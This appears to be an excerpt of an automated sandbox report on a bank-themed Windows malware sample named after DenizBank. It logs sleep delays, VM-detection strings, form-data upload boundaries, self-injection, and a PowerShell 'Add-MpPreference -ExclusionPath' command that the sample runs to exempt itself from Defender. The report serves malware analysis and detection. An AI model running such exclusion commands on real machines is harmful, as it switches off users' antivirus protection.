Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599891			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599782			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599657			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599532			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599407			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599297			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 599063			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598938			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598813			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598688			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598577			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598469			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598344			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 598110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597969			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597844			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 597110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596985			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596860			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 596110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595985			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595860			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 595110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594985			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594860			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594735			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594610			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594485			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594360			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594235			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 594110			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Thread delayed: delay time: 593985			Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f642e0dcb3ce0d
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fb18cb13cbb415
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1802704510.000000000711D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: denizbank 25.11.2024 E80 aspc.exe, 00000000.00000002.1798401840.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f503d02294eb00
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fdc146993e4482<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f3b558df1e00f0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4222458483.0000000006647000.00000004.00000020.00020000.00000000.sdmp, denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4214744246.00000000011E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fc0ff353526364<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fce88f3187a0bc<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8ff950ef5a466fb<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8fe94ecb8a38815<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f7935aa30f4b9d
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f8b9e2cb6cde30
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kqEmultipart/form-data; boundary=------------------------8f9f6d994425123

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Code function: 5_2_06A19548 LdrInitializeThunk,

5_2_06A19548

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Memory written: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Process created: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"			Jump to behavior

Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqpM!
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0O
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPl
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq$y
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPg
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0G
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0J
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0C
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,&"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0E
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPb
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0B
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqp{
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0p.
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq /)
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq04
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqps
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqpv
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPV
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@O$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqdV(
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0p
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtUB
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0k
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq$y5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt,
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4X+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt*
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP|
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0[
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP}
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0]
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPx
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPz
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqX>?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq|fA
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtP
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq8@/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtD
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLi1
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqh`*
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,(,
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq8a9
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,I6
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4Z
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq0s
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqP0$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq 13
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTO
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq42
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@Q.
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtq
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@r=
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtn
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTz0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTM
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtj
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@r8
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqdY&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4Z5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq s@
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqTA
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt[
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqt^
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqD9+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,L
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLg
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,G
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLf
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLb
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqL[
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqlx
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLW
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,9
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqlt
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqls
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqLV
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqhb4
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq8d"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqH!/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\J1
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqxA*
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqp,
